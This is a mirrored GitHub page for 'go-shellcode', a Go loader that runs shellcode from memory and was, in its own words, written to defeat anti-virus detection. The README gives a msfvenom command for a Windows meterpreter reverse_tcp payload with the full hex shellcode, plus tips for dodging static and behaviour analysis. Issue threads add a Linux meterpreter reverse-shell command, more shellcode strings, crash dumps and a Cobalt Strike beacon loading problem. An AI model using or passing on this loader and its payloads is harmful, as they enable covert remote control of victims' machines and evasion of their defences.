GithubHelp home page GithubHelp logo

go-shellcode's Introduction

shellcode

This is a program to run shellcode as its own process, all from memory. This was written to defeat anti-virus detection. This is now getting detected as VirTool:Win32/Shrine.A. Use a tool like garble to obfuscate the binary to defeat static analysis. Change the code yourself to defeat behavior analysis.

Usage

Keep in mind that only 64bit shellcode will run in a 64bit process. This can't autodetect your shellcode architecture.

Use msfvenom or metasploit to generate a bit of shellcode as hex format:

$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444

c:\windows\temp>sc.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a687f000001680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5

Sometimes the shellcode is larger than the limit of a command line with arguments. Try putting the whole thing in a batch script instead.

Build

Standard go building steps. Set GOOS to windows and GOARCH to the same as your shellcode, either 386 or amd64. This can't detect the architecture of your shellcode.

The resulting binary is a little big, 2.1M, but compresses well with UPX, roughly 508K.

go-shellcode's People

Contributors

brimstone avatar ilyapashuk avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

listinvest lily110 harry1080 5up3rc dragoneeg yuxiaokui orf53975 selfevo xsr7yer hohjgdhsj qsdj gavz dannymas appleleaf awesome-security lsh4ck nonu11 socmap alilangtest langyayue raystyle misterch0c sunlewuyou triplekill xundididi kissthink fdrag0n crackercat zobber natto97 jermainlaforce futurebody avi8892 unbaiat listenquiet chanpu9 madaolw b0han711 koushui hollerith scusi 5l1v3r1 comddy jas502n fdlucifer wolfking2 ap3r pyking beyondcy sswares kevinmustaqim sobinge taibaiyifeng underwood12 iiiusky blues-star zu1kbackup olivierh59500 p0fy sw0rrdd opensesamedoors missxq131 stormfleet youcango xichawai backcountryinfosec bb33bb conanjun fadinglr jeningogo n0a xiajun325 zilong3033 sonwnja p4sschen b1tg yoohooyoo hakuqaq wxm-radish mfadzilr youyuelj 0x0000141 yanshu911 sairson ktanable1 gysf666 aqimmm 4v4loon guquan1839 forktopot safebaseline c1em0 rafaelescrich empty2081 x-o-r-r-o int2ecall chenjianlong01 guangxinzhang demonyaksa rickhenderson

go-shellcode's Issues

win10 x64 EXE shellcode run error

os:windows 10 20H2 19042.1110

shellcode

msfvenom -p windows/exec CMD=calc.exe -b "x00" -f hex

run error

C:\Users\Administrator\go\src\go-shellcode>main.exe 33c983e9cfe8ffffffffc05e81760e1a7a45f883eefce2f4e692c7f81a7a2571ff4b859c912a75734876ceaa0ef137d015cd0fde2b85e9c47b0647d43abb8af51bbda70a482dceaa0af10fc491365480f93244294bf11cd81ba9
ceb102997fb1914ecef9cc4bba54dbb548f9dd42a58dec7938002107618dfe22cea03e7b969e91760e734266442b917ecef9caf301dc3e211e9943201407fa251aa29168ae75471044759fc845f81a2a2dc99115c207cfc1b54db82c2d5e8fc7d807cf46438410fabe186f7ffebf09082a921a29
ba2d791b299b341f3d9d1a7a45f8
Exception 0xc0000005 0x1 0xe471c 0xc0000e470c
PC=0xc0000e470c

runtime: unknown pc 0xc0000e470c
stack: frame={sp:0xc0000d5e50, fp:0x0} stack=[0xc0000c6000,0xc0000d6000)
000000c0000d5d50:  0000000000000001  0000000000000000
000000c0000d5d60:  0000000000000000  000000c000098060
000000c0000d5d70:  000000c000098060  0000000000000000
000000c0000d5d80:  00000000001a0734 <sync/atomic.StorePointer+52>  000000c0000c43b0
000000c0000d5d90:  000000c0000a6420  000000000014ce29 <runtime.mallocgc+905>
000000c0000d5da0:  000000c0000d5df8  00000000001d1fb6 <syscall.(*LazyProc).Find+118>
000000c0000d5db0:  000000c0000c4390  000000c0000a6420
000000c0000d5dc0:  000000000000000e  010000c0000a6420
000000c0000d5dd0:  0000026f04760558  0000000000000000
000000c0000d5de0:  0000000000000020  0000000000000000
000000c0000d5df0:  0000000000000001  000000c0000d5e48
000000c0000d5e00:  00000000001d2178 <syscall.(*LazyProc).Call+120>  000000c0000a6420
000000c0000d5e10:  000000c0000aa0a0  0000000000000004
000000c0000d5e20:  0000000000000004  0000000000000001
000000c0000d5e30:  0000000000000000  00000000002480a8
000000c0000d5e40:  00000000002bfaa0  000000c0000e470a
000000c0000d5e50: <00000000001fba77 <github.com/brimstone/go-shellcode.Run+375>  000000c0000c4390
000000c0000d5e60:  000000c0000aa0a0  0000000000000004
000000c0000d5e70:  0000000000000004  0000000000000001
000000c0000d5e80:  0000000000000000  00000000002480a8
000000c0000d5e90:  00000000002bfaa0  00000000000000dc
000000c0000d5ea0:  000000000022bdf0  000000c0000ac06c
000000c0000d5eb0:  000000c0000e4700  000000c0000d5f78
000000c0000d5ec0:  00000000001fbdef <main.main+527>  000000c0000e4700
000000c0000d5ed0:  00000000000000dc  00000000000001c0
000000c0000d5ee0:  000000c0000e4700  00000000000001b8
000000c0000d5ef0:  00000000000001c0  00000000000000dc
000000c0000d5f00:  0000000000000000  0000000000000000
000000c0000d5f10:  000000c000086000  00000000000000dc
000000c0000d5f20:  00000000000001c0  0000000000000000
000000c0000d5f30:  0000000000000000  000000c0000d5f78
000000c0000d5f40:  0000000000145a4b <runtime.closechan+683>  000000c000086058
runtime: unknown pc 0xc0000e470c
stack: frame={sp:0xc0000d5e50, fp:0x0} stack=[0xc0000c6000,0xc0000d6000)
000000c0000d5d50:  0000000000000001  0000000000000000
000000c0000d5d60:  0000000000000000  000000c000098060
000000c0000d5d70:  000000c000098060  0000000000000000
000000c0000d5d80:  00000000001a0734 <sync/atomic.StorePointer+52>  000000c0000c43b0
000000c0000d5d90:  000000c0000a6420  000000000014ce29 <runtime.mallocgc+905>
000000c0000d5da0:  000000c0000d5df8  00000000001d1fb6 <syscall.(*LazyProc).Find+118>
000000c0000d5db0:  000000c0000c4390  000000c0000a6420
000000c0000d5dc0:  000000000000000e  010000c0000a6420
000000c0000d5dd0:  0000026f04760558  0000000000000000
000000c0000d5de0:  0000000000000020  0000000000000000
000000c0000d5df0:  0000000000000001  000000c0000d5e48
000000c0000d5e00:  00000000001d2178 <syscall.(*LazyProc).Call+120>  000000c0000a6420
000000c0000d5e10:  000000c0000aa0a0  0000000000000004
000000c0000d5e20:  0000000000000004  0000000000000001
000000c0000d5e30:  0000000000000000  00000000002480a8
000000c0000d5e40:  00000000002bfaa0  000000c0000e470a
000000c0000d5e50: <00000000001fba77 <github.com/brimstone/go-shellcode.Run+375>  000000c0000c4390
000000c0000d5e60:  000000c0000aa0a0  0000000000000004
000000c0000d5e70:  0000000000000004  0000000000000001
000000c0000d5e80:  0000000000000000  00000000002480a8
000000c0000d5e90:  00000000002bfaa0  00000000000000dc
000000c0000d5ea0:  000000000022bdf0  000000c0000ac06c
000000c0000d5eb0:  000000c0000e4700  000000c0000d5f78
000000c0000d5ec0:  00000000001fbdef <main.main+527>  000000c0000e4700
000000c0000d5ed0:  00000000000000dc  00000000000001c0
000000c0000d5ee0:  000000c0000e4700  00000000000001b8
000000c0000d5ef0:  00000000000001c0  00000000000000dc
000000c0000d5f00:  0000000000000000  0000000000000000
000000c0000d5f10:  000000c000086000  00000000000000dc
000000c0000d5f20:  00000000000001c0  0000000000000000
000000c0000d5f30:  0000000000000000  000000c0000d5f78
000000c0000d5f40:  0000000000145a4b <runtime.closechan+683>  000000c000086058
rax     0xe4701
rbx     0x2bfaa0
rcx     0x30
rdi     0xc000038001
rsi     0xe470e
rbp     0xc0000d5eb8
rsp     0xc0000d5e50
r8      0xbefa7ffd48
r9      0x40
r10     0x0
r11     0x246
r12     0x1
r13     0x1
r14     0x6
r15     0xffffffffffffffff
rip     0xc0000e470c
rflags  0x10213
cs      0x33
fs      0x53
gs      0x2b

win7 x64 EXE shellcode run error

Test the project on Win7 x64 with Go version13.5
The configuration about GOOS and everything else are all correct , the only thing i changed is that i removed the unix part file , so the #include file missing error would not trouble me anymore.
Then i build the exe just named it main.exe
And the unexpection matter happend when i tried to run a calc.exe shellcode using the released exe.
Here are the output line from CMD:

C:\Users\xxx\Documents\go-shellcode\cmd\sc>main.exe 33C050B82E646C6C50B8656C333250B86B65726E508BC450B87B1D807CFFD033C050B82E65786550B863616C63508BC46A0550B8AD23867CFFD033C050B8FACA817CFFD0

Exception 0xc0000005 0x8 0x7c801d7b 0x7c801d7b
PC=0x7c801d7b

runtime: unknown pc 0x7c801d7b
stack: frame={sp:0xc00007be08, fp:0x0} stack=[0xc000074000,0xc00007c000)
000000c00007bd08: 000000c000084090 0000000000000044
000000c00007bd18: 0000000000000040 000000c0000120bc
000000c00007bd28: 0000000000000000 0000000000000000
000000c00007bd38: 0000000000000001 0000000000000000
000000c00007bd48: 0000000000000000 000000c00005c330
000000c00007bd58: 000000c0000044e0 000000000000000e
000000c00007bd68: 000000000040b6d0 <runtime.mallocgc+832> 0000000000000000
000000c00007bd78: 0000000000000000 0000000000000008
000000c00007bd88: 000000c00007bd50 0000000000487096 <syscall.(*LazyProc).Find+150>
000000c00007bd98: 0100000000000000 0000000000000000
000000c00007bda8: 0000000000000020 000000c00000c3e0
000000c00007bdb8: 000000c00007bde0 00000000004871c2 <syscall.(*LazyProc).mustFind+50>
000000c00007bdc8: 000000c00005c330 0000000000000000
000000c00007bdd8: 0000000000000001 000000c00007be30
000000c00007bde8: 00000000004872c6 <syscall.(*LazyProc).Call+102> 000000c0000044e0
000000c00007bdf8: 000000c00000c3e0 0000000000000004
000000c00007be08: <000000c0000840af 000000000007be18
000000c00007be18: 000000006e72656b 0000000032336c65
000000c00007be28: 000000006c6c642e 0000000000000000
000000c00007be38: 000000000049e19f <github.com/brimstone/go-shellcode.Run+367> 000000c000
05c330
000000c00007be48: 000000c00000c3e0 0000000000000004
000000c00007be58: 0000000000000004 0000000000000001
000000c00007be68: 0000000000000000 00000000004f1460
000000c00007be78: 000000000059a600 0000000000000044
000000c00007be88: 000000c000084090 00000000004de510
000000c00007be98: 00000000004de510 000000c0000120bc
000000c00007bea8: 000000c00007bf50 000000000049e415 <main.main+373>
000000c00007beb8: 000000c000084090 0000000000000044
000000c00007bec8: 0000000000000090 000000c000084090
000000c00007bed8: 0000000000000088 0000000000000090
000000c00007bee8: 0000000000000044 0000000000000000
000000c00007bef8: 0000000000000000 000000000056a500
runtime: unknown pc 0x7c801d7b
stack: frame={sp:0xc00007be08, fp:0x0} stack=[0xc000074000,0xc00007c000)
000000c00007bd08: 000000c000084090 0000000000000044
000000c00007bd18: 0000000000000040 000000c0000120bc
000000c00007bd28: 0000000000000000 0000000000000000
000000c00007bd38: 0000000000000001 0000000000000000
000000c00007bd48: 0000000000000000 000000c00005c330
000000c00007bd58: 000000c0000044e0 000000000000000e
000000c00007bd68: 000000000040b6d0 <runtime.mallocgc+832> 0000000000000000
000000c00007bd78: 0000000000000000 0000000000000008
000000c00007bd88: 000000c00007bd50 0000000000487096 <syscall.(*LazyProc).Find+150>
000000c00007bd98: 0100000000000000 0000000000000000
000000c00007bda8: 0000000000000020 000000c00000c3e0
000000c00007bdb8: 000000c00007bde0 00000000004871c2 <syscall.(*LazyProc).mustFind+50>
000000c00007bdc8: 000000c00005c330 0000000000000000
000000c00007bdd8: 0000000000000001 000000c00007be30
000000c00007bde8: 00000000004872c6 <syscall.(*LazyProc).Call+102> 000000c0000044e0
000000c00007bdf8: 000000c00000c3e0 0000000000000004
000000c00007be08: <000000c0000840af 000000000007be18
000000c00007be18: 000000006e72656b 0000000032336c65
000000c00007be28: 000000006c6c642e 0000000000000000
000000c00007be38: 000000000049e19f <github.com/brimstone/go-shellcode.Run+367> 000000c000
05c330
000000c00007be48: 000000c00000c3e0 0000000000000004
000000c00007be58: 0000000000000004 0000000000000001
000000c00007be68: 0000000000000000 00000000004f1460
000000c00007be78: 000000000059a600 0000000000000044
000000c00007be88: 000000c000084090 00000000004de510
000000c00007be98: 00000000004de510 000000c0000120bc
000000c00007bea8: 000000c00007bf50 000000000049e415 <main.main+373>
000000c00007beb8: 000000c000084090 0000000000000044
000000c00007bec8: 0000000000000090 000000c000084090
000000c00007bed8: 0000000000000088 0000000000000090
000000c00007bee8: 0000000000000044 0000000000000000
000000c00007bef8: 0000000000000000 000000000056a500
rax 0x7c801d7b
rbx 0x59a600
rcx 0x0
rdi 0xc000028001
rsi 0x0
rbp 0xc00007bea8
rsp 0xc00007be08
r8 0x22fda8
r9 0xc0000120bc
r10 0x0
r11 0x202
r12 0xffffffffffffffff
r13 0x20
r14 0x1f
r15 0x100
rip 0x7c801d7b
rflags 0x10246
cs 0x33
fs 0x53
gs 0x2b

not return the shell to my debian

base) root@debian:/usr/lib/go-1.17/src/go-shellcode/cmd/sc# ./main ./rev.hex
(base) root@debian:/usr/lib/go-1.17/src/go-shellcode/cmd/sc# SIGILL: illegal instruction
PC=0x7f235430d004 m=0 sigcode=2
instruction bytes: 0x66 0x66 0x36 0x61 0x30 0x39 0x35 0x38 0x39 0x39 0x62 0x36 0x31 0x30 0x34 0x38

goroutine 0 [idle]:
runtime: unknown pc 0x7f235430d004
stack: frame={sp:0x7fff655a3c08, fp:0x0} stack=[0x7fff64da4c58,0x7fff655a3c90)
0x00007fff655a3b08: 0x0000000000000001 0x0000000000000000
0x00007fff655a3b18: 0x00000000004e0497 0x0000000000000188
0x00007fff655a3b28: 0x0000000000644120 0x00007fff655a3b50
0x00007fff655a3b38: 0x00007fff655a3b80 0x0000000000000000
0x00007fff655a3b48: 0x0000000000000000 0x00007f235430f858
0x00007fff655a3b58: 0x000000000040cfc0 <runtime.persistentalloc.func1+0x0000000000000000> 0x0000000000004000
0x00007fff655a3b68: 0x0000000000000000 0x00007fff655a3bb8
0x00007fff655a3b78: 0x00007fff655a3b90 0x0000000000425c39 <runtime.newAllocBits+0x0000000000000019>
0x00007fff655a3b88: 0x0000000000416fa5 <runtime.(*fixalloc).alloc+0x0000000000000085> 0x00007f0000000000
0x00007fff655a3b98: 0x0000000000000000 0x0000000000000180
0x00007fff655a3ba8: 0x000000000060e080 0x00007f237cfae738
0x00007fff655a3bb8: 0x00007fff655a3c10 0x00007fff655a3c08
0x00007fff655a3bc8: 0x1a9045363d95bc00 0x000000c000082000
0x00007fff655a3bd8: 0x000000c000047f00 0x000000c000082000
0x00007fff655a3be8: 0x000000000048e081 0x0000000000000180
0x00007fff655a3bf8: 0x000000c000047ec8 0x000000c000047d40
0x00007fff655a3c08: <0x000000000045c2f0 <runtime.asmcgocall+0x0000000000000070> 0x00000000004256d7 <runtime.removefinalizer+0x0000000000000077>
0x00007fff655a3c18: 0x000000c000060180 0x000000c000063501
0x00007fff655a3c28: 0x00007f235430f8e8 0x00007fff655a3c48
0x00007fff655a3c38: 0x0000000000000168 0x000000c0000001a0
0x00007fff655a3c48: 0x000000c000047d88 0x000000000045a449 <runtime.systemstack+0x0000000000000049>
0x00007fff655a3c58: 0x000000000045eae9 <runtime.newproc+0x0000000000000029> 0x000000000a323531
0x00007fff655a3c68: 0x00007fff64da4c58 0x000000000060dee0
0x00007fff655a3c78: 0x000000000049d230 0x000000000045a345 <runtime.mstart+0x0000000000000005>
0x00007fff655a3c88: 0x000000000045a2fb <runtime.rt0_go+0x000000000000013b>
runtime: unknown pc 0x7f235430d004
stack: frame={sp:0x7fff655a3c08, fp:0x0} stack=[0x7fff64da4c58,0x7fff655a3c90)
0x00007fff655a3b08: 0x0000000000000001 0x0000000000000000
0x00007fff655a3b18: 0x00000000004e0497 0x0000000000000188
0x00007fff655a3b28: 0x0000000000644120 0x00007fff655a3b50
0x00007fff655a3b38: 0x00007fff655a3b80 0x0000000000000000
0x00007fff655a3b48: 0x0000000000000000 0x00007f235430f858
0x00007fff655a3b58: 0x000000000040cfc0 <runtime.persistentalloc.func1+0x0000000000000000> 0x0000000000004000
0x00007fff655a3b68: 0x0000000000000000 0x00007fff655a3bb8
0x00007fff655a3b78: 0x00007fff655a3b90 0x0000000000425c39 <runtime.newAllocBits+0x0000000000000019>
0x00007fff655a3b88: 0x0000000000416fa5 <runtime.(*fixalloc).alloc+0x0000000000000085> 0x00007f0000000000
0x00007fff655a3b98: 0x0000000000000000 0x0000000000000180
0x00007fff655a3ba8: 0x000000000060e080 0x00007f237cfae738
0x00007fff655a3bb8: 0x00007fff655a3c10 0x00007fff655a3c08
0x00007fff655a3bc8: 0x1a9045363d95bc00 0x000000c000082000
0x00007fff655a3bd8: 0x000000c000047f00 0x000000c000082000
0x00007fff655a3be8: 0x000000000048e081 0x0000000000000180
0x00007fff655a3bf8: 0x000000c000047ec8 0x000000c000047d40
0x00007fff655a3c08: <0x000000000045c2f0 <runtime.asmcgocall+0x0000000000000070> 0x00000000004256d7 <runtime.removefinalizer+0x0000000000000077>
0x00007fff655a3c18: 0x000000c000060180 0x000000c000063501
0x00007fff655a3c28: 0x00007f235430f8e8 0x00007fff655a3c48
0x00007fff655a3c38: 0x0000000000000168 0x000000c0000001a0
0x00007fff655a3c48: 0x000000c000047d88 0x000000000045a449 <runtime.systemstack+0x0000000000000049>
0x00007fff655a3c58: 0x000000000045eae9 <runtime.newproc+0x0000000000000029> 0x000000000a323531
0x00007fff655a3c68: 0x00007fff64da4c58 0x000000000060dee0
0x00007fff655a3c78: 0x000000000049d230 0x000000000045a345 <runtime.mstart+0x0000000000000005>
0x00007fff655a3c88: 0x000000000045a2fb <runtime.rt0_go+0x000000000000013b>

goroutine 1 [syscall]:
runtime.cgocall(0x48e0b0, 0xc000047f00)
/usr/lib/go-1.17/src/runtime/cgocall.go:156 +0x5c fp=0xc000047ed8 sp=0xc000047ea0 pc=0x403ebc
github.com/brimstone/go-shellcode._Cfunc_call(0xc000082000, 0x104)
_cgo_gotypes.go:44 +0x45 fp=0xc000047f00 sp=0xc000047ed8 pc=0x48dde5
github.com/brimstone/go-shellcode.Run(...)
/usr/lib/go-1.17/src/go-shellcode/shellcode_unix.go:32
main.main()
/usr/lib/go-1.17/src/go-shellcode/cmd/sc/main.go:35 +0x185 fp=0xc000047f80 sp=0xc000047f00 pc=0x48dfe5
runtime.main()
/usr/lib/go-1.17/src/runtime/proc.go:255 +0x227 fp=0xc000047fe0 sp=0xc000047f80 pc=0x433467
runtime.goexit()
/usr/lib/go-1.17/src/runtime/asm_amd64.s:1581 +0x1 fp=0xc000047fe8 sp=0xc000047fe0 pc=0x45c601

rax 0x38
rbx 0xc000047f00
rcx 0x7f235430d000
rdx 0x80
rdi 0x7f235430d000
rsi 0x313b1834
rbp 0xc000047ec8
rsp 0x7fff655a3c08
r8 0x4
r9 0x7f235430d060
r10 0x22
r11 0x7f235430d0e4
r12 0xc000047d40
r13 0x0
r14 0xc0000001a0
r15 0x40
rip 0x7f235430d004
rflags 0x10202
cs 0x33
fs 0x0
gs 0x0
(base) root@debian:/usr/lib/go-1.17/src/go-shellcode/cmd/sc#
(base) root@debian:/usr/lib/go-1.17/src/go-shellcode/cmd/sc#
(base) root@debian:/usr/lib/go-1.17/src/go-shellcode/cmd/sc#
(base) root@debian:/usr/lib/go-1.17/src/go-shellcode/cmd/sc#
(base) root@debian:/usr/lib/go-1.17/src/go-shellcode/cmd/sc#

not return the shell to my debian

build
(base) root@debian:/usr/lib/go-1.17/src/go-shellcode/cmd/sc# go build -ldflags '-s -w -L /lib/x86_64-linux-gnu/*.so -linkmode "external" -extldflags "-static"' main.go

shellcode
(base) root@debian:/usr/lib/go-1.17/src/go-shellcode/cmd/sc# msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.2.128 lport=4444 -f hex -o rev.hex

not return the shell to my debian

生成失败

用go build 生成失败是什么原因呢?

win10 x64 EXE shellcode run error

runtime: unknown pc 0x7fff8a4ea859
stack: frame={sp:0xc0000883a0, fp:0x0} stack=[0xc000082000,0xc00008a000)
000000c0000882a0: 0000000000000000 00000000ffffffff
000000c0000882b0: 00000000002c4000 00007fff8a4d1efb
000000c0000882c0: 00000000000db080 00007fff8c8535d0
000000c0000882d0: 0000107f41f575eb 00000000000002c8
000000c0000882e0: 000000c000088430 00007fff7e0399c6
000000c0000882f0: 0000000000000000 00007fff8c8535d0
000000c000088300: 0000107f41f5759b 00007fff7e048510
000000c000088310: 0000000000000000 00007fff8a4d1efb
000000c000088320: 000000c000088430 000000c0000884b0
000000c000088330: 0000107f41f5744b 0000000000000000
000000c000088340: 000000c0000886e0 00007fff7e0399c6
000000c000088350: 000000000000000a 00007fff7e03fbe2
000000c000088360: 00000000045e1050 00007fff7e037d5a
000000c000088370: 0000107f41f5752b 00007fff7e038ab1
000000c000088380: 0000000000163f80 0000000000000410
000000c000088390: 0000000000000001 00007fff8a4ea859
000000c0000883a0: <00007fff7e06abf0 0000000000139c30
000000c0000883b0: 0000000000101ff0 000000c0000884b0
000000c0000883c0: 0000000840010006 0000000000000000
000000c0000883d0: 00007fff8a4ea859 0000000000000002
000000c0000883e0: 0000000000000039 000000c000088780
000000c0000883f0: ffffffff0000002e 0000000000000016
000000c000088400: 0000000000088620 0000000000000000
000000c000088410: 0000000000000000 00007fff7e048528
000000c000088420: 000000c0000886e0 000000c000000000
000000c000088430: 00007fff7e056750 00000000045e1f40
000000c000088440: 00000000045e1040 0000000000051701
000000c000088450: 00000000045e1050 000000c000000001
000000c000088460: 0000a59a2631eabc 0000000000050000
000000c000088470: 363b783e00000001 00007fff8a4ea4c7
000000c000088480: 00000000000004b4 0000000000051c10
000000c000088490: 0000000000000000 000000c000088690
runtime: unknown pc 0x7fff8a4ea859
stack: frame={sp:0xc0000883a0, fp:0x0} stack=[0xc000082000,0xc00008a000)
000000c0000882a0: 0000000000000000 00000000ffffffff
000000c0000882b0: 00000000002c4000 00007fff8a4d1efb
000000c0000882c0: 00000000000db080 00007fff8c8535d0
000000c0000882d0: 0000107f41f575eb 00000000000002c8
000000c0000882e0: 000000c000088430 00007fff7e0399c6
000000c0000882f0: 0000000000000000 00007fff8c8535d0
000000c000088300: 0000107f41f5759b 00007fff7e048510
000000c000088310: 0000000000000000 00007fff8a4d1efb
000000c000088320: 000000c000088430 000000c0000884b0
000000c000088330: 0000107f41f5744b 0000000000000000
000000c000088340: 000000c0000886e0 00007fff7e0399c6
000000c000088350: 000000000000000a 00007fff7e03fbe2
000000c000088360: 00000000045e1050 00007fff7e037d5a
000000c000088370: 0000107f41f5752b 00007fff7e038ab1
000000c000088380: 0000000000163f80 0000000000000410
000000c000088390: 0000000000000001 00007fff8a4ea859
000000c0000883a0: <00007fff7e06abf0 0000000000139c30
000000c0000883b0: 0000000000101ff0 000000c0000884b0
000000c0000883c0: 0000000840010006 0000000000000000
000000c0000883d0: 00007fff8a4ea859 0000000000000002
000000c0000883e0: 0000000000000039 000000c000088780
000000c0000883f0: ffffffff0000002e 0000000000000016
000000c000088400: 0000000000088620 0000000000000000
000000c000088410: 0000000000000000 00007fff7e048528
000000c000088420: 000000c0000886e0 000000c000000000
000000c000088430: 00007fff7e056750 00000000045e1f40
000000c000088440: 00000000045e1040 0000000000051701
000000c000088450: 00000000045e1050 000000c000000001
000000c000088460: 0000a59a2631eabc 0000000000050000
000000c000088470: 363b783e00000001 00007fff8a4ea4c7
000000c000088480: 00000000000004b4 0000000000051c10
000000c000088490: 0000000000000000 000000c000088690
rax 0x7
rbx 0x139c30
rcx 0xc000087c50
rdi 0x410
rsi 0x101ff0
rbp 0x1
rsp 0xc0000883a0
r8 0x7fff8a3918cc
r9 0xc000087d30
r10 0x10
r11 0x10
r12 0x0
r13 0xc000089058
r14 0x163f80
r15 0x0
rip 0x7fff8a4ea859
rflags 0x202
cs 0x33
fs 0x53
gs 0x2b

no compile.. in Linux

hi, how compile?) kali-linux
command: go build shellcode_windows.go

command-line-arguments
./shellcode_windows,go:8:26: undefiend: syscall.NewLazyDLL

windows 10 x64 :

C:\Windows\system32>cd C:\Go\PROGRAMS\go-shellcode-master\

C:\Go\PROGRAMS\go-shellcode-master>set GOOS=windows

C:\Go\PROGRAMS\go-shellcode-master>set GOARCH=386

C:\Go\PROGRAMS\go-shellcode-master>go build shellcode_windows.go

C:\Go\PROGRAMS\go-shellcode-master>dir

03.01.2020 23:08

.
03.01.2020 23:08 ..
03.01.2020 23:08 .github
03.01.2020 23:08 cmd
03.01.2020 23:08 50 go.mod
03.01.2020 23:08 1 576 README.md
03.01.2020 23:08 581 shellcode_unix.go
03.01.2020 23:08 1 150 shellcode_windows.go

C:\Go\PROGRAMS\go-shellcode-master>

Cannot load the stageless shellcode generated by CS on amd64-arch

I have generated the following four beacons shellcode with CS:

payload_stageless_x64.bin
payload_stageless_x86.bin
payload_stage_x64.bin
payload_stage_x64.bin

Except for payload_stageless_x64.bin, everything else loaded and works well.

To reproduce

  1. Start CS, Attacks -> Packages -> Windows Executable (S) -> set output=Raw, set x64=true -> generate
  2. Modify the source code, readfile then call the Run function
  3. Set env, build, and run

Thx for your excellent tool : )

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.